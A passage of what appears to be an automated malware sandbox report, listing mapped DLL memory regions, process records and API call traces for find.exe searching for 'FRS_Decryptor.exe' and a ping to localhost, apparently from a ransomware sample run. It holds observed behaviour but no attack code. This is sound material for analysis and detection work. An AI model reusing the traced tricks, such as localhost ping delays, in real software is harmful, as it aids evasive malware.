(normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 5195 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5196 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5197 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 5198 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5199 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5200 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5201 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5202 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5203 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5204 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5205 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5206 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5207 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5208 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5209 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5210 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5211 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5212 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5213 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5214 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5215 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5216 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5217 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5218 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5219 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5220 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5221 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5222 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5223 start_va = 0x7ecb0000 end_va = 0x7edaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecb0000" filename = "" Region: id = 5224 start_va = 0x7edd6000 end_va = 0x7edd8fff entry_point = 0x0 region_type = private name = "private_0x000000007edd6000" filename = "" Thread: id = 281 os_tid = 0x610 Thread: id = 283 os_tid = 0x550 Thread: id = 284 os_tid = 0x5c4 Thread: id = 285 os_tid = 0x814 Process: id = "100" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x22686000" os_pid = "0x780" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "98" os_parent_pid = "0x6c8" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5141 start_va = 0x6c0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 5142 start_va = 0x6e0000 end_va = 0x6e1fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 5143 start_va = 0x6f0000 end_va = 0x6fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 5144 start_va = 0x700000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5145 start_va = 0x740000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 5146 start_va = 0x780000 end_va = 0x783fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 5147 start_va = 0x790000 end_va = 0x790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 5148 start_va = 0x7a0000 end_va = 0x7a1fff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 5149 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 5150 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5151 start_va = 0x7ec20000 end_va = 0x7ec42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec20000" filename = "" Region: id = 5152 start_va = 0x7ec48000 end_va = 0x7ec48fff entry_point = 0x0 region_type = private name = "private_0x000000007ec48000" filename = "" Region: id = 5153 start_va = 0x7ec4c000 end_va = 0x7ec4cfff entry_point = 0x0 region_type = private name = "private_0x000000007ec4c000" filename = "" Region: id = 5154 start_va = 0x7ec4d000 end_va = 0x7ec4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec4d000" filename = "" Region: id = 5155 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5156 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5157 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5158 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5163 start_va = 0x890000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 5164 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5165 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5166 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 282 os_tid = 0x47c Process: id = "101" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x6d084000" os_pid = "0x804" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5225 start_va = 0x4f0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5226 start_va = 0x510000 end_va = 0x511fff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5227 start_va = 0x520000 end_va = 0x52efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5228 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5229 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5230 start_va = 0x5b0000 end_va = 0x5b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 5231 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 5232 start_va = 0x5d0000 end_va = 0x5d1fff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5233 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 5234 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5235 start_va = 0x7ef40000 end_va = 0x7ef62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef40000" filename = "" Region: id = 5236 start_va = 0x7ef67000 end_va = 0x7ef67fff entry_point = 0x0 region_type = private name = "private_0x000000007ef67000" filename = "" Region: id = 5237 start_va = 0x7ef6c000 end_va = 0x7ef6efff entry_point = 0x0 region_type = private name = "private_0x000000007ef6c000" filename = "" Region: id = 5238 start_va = 0x7ef6f000 end_va = 0x7ef6ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef6f000" filename = "" Region: id = 5239 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5240 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5241 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5242 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5243 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 5244 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5245 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5246 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5247 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 5248 start_va = 0x500000 end_va = 0x503fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5249 start_va = 0x5e0000 end_va = 0x65dfff entry_point = 0x5e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5250 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 5251 start_va = 0xb30000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 5252 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5253 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5254 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5255 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5256 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5257 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5258 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5259 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5260 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5261 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5262 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5263 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5264 start_va = 0x7ee40000 end_va = 0x7ef3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee40000" filename = "" Region: id = 5265 start_va = 0x6b0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 5266 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 5267 start_va = 0x7ef69000 end_va = 0x7ef6bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef69000" filename = "" Region: id = 5268 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 5269 start_va = 0x510000 end_va = 0x512fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 5270 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 5271 start_va = 0x680000 end_va = 0x682fff entry_point = 0x680000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 5272 start_va = 0x730000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 5273 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 5274 start_va = 0x7ef64000 end_va = 0x7ef66fff entry_point = 0x0 region_type = private name = "private_0x000000007ef64000" filename = "" Thread: id = 286 os_tid = 0x260 [0104.591] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0104.591] __set_app_type (_Type=0x1) [0104.591] __p__fmode () returned 0x76ea1768 [0104.591] __p__commode () returned 0x76ea176c [0104.591] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0104.591] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0104.591] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.593] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.593] _fileno (_File=0x76ea4c28) returned 1 [0104.593] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.593] GetFileType (hFile=0x28) returned 0x2 [0104.593] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5af020 | out: lpMode=0x5af020) returned 0 [0104.593] GetLastError () returned 0x6 [0104.593] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef84, nSize=0x50 | out: lpBuffer="䤐³") returned 0x0 [0104.593] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0104.595] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x5af03c | out: phkResult=0x5af03c*=0x88) returned 0x0 [0104.595] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x5af030, lpData=0x5af038, lpcbData=0x5af034*=0x4 | out: lpType=0x5af030*=0x0, lpData=0x5af038*=0x0, lpcbData=0x5af034*=0x4) returned 0x2 [0104.595] RegCloseKey (hKey=0x88) returned 0x0 [0104.595] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x5af000*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5af03c | out: ppResult=0x5af03c*=0xb3c228*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb38a78*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0104.596] FreeAddrInfoW (pAddrInfo=0xb3c228*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb38a78*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0104.596] IcmpCreateFile () returned 0xb369c0 [0104.598] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xb3c200 [0104.598] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xb45270 [0104.598] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x5af138, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0104.600] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="竈´宅Z┗\x94䰨盪❋") returned 0x14 [0104.600] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.600] _fileno (_File=0x76ea4c28) returned 1 [0104.600] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.600] GetFileType (hFile=0x28) returned 0x2 [0104.600] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0104.600] GetLastError () returned 0x6 [0104.600] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z❋") returned 0x0 [0104.601] _fileno (_File=0x76ea4c28) returned 1 [0104.601] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0104.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0104.601] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xb47b00 [0104.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xb47b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0104.601] _fileno (_File=0x76ea4c28) returned 1 [0104.601] _write (in: _FileHandle=1, _Buf=0xb47b00*, _MaxCharCount=0x14 | out: _Buf=0xb47b00*) returned 20 [0104.601] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.601] _fileno (_File=0x76ea4c28) returned 1 [0104.601] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0104.601] LocalFree (hMem=0xb47b00) returned 0x0 [0104.601] LocalFree (hMem=0xb47ac8) returned 0x0 [0104.601] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="竈´宅Z▪\x94䰨盪❚") returned 0x18 [0104.601] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.601] _fileno (_File=0x76ea4c28) returned 1 [0104.601] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.601] GetFileType (hFile=0x28) returned 0x2 [0104.601] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0104.601] GetLastError () returned 0x6 [0104.601] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z❚") returned 0x0 [0104.601] _fileno (_File=0x76ea4c28) returned 1 [0104.601] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0104.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.601] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xb3c4a8 [0104.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xb3c4a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0104.601] _fileno (_File=0x76ea4c28) returned 1 [0104.601] _write (in: _FileHandle=1, _Buf=0xb3c4a8*, _MaxCharCount=0x18 | out: _Buf=0xb3c4a8*) returned 24 [0104.601] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.601] _fileno (_File=0x76ea4c28) returned 1 [0104.601] _setmode (_FileHandle=1, _Mode=16384) 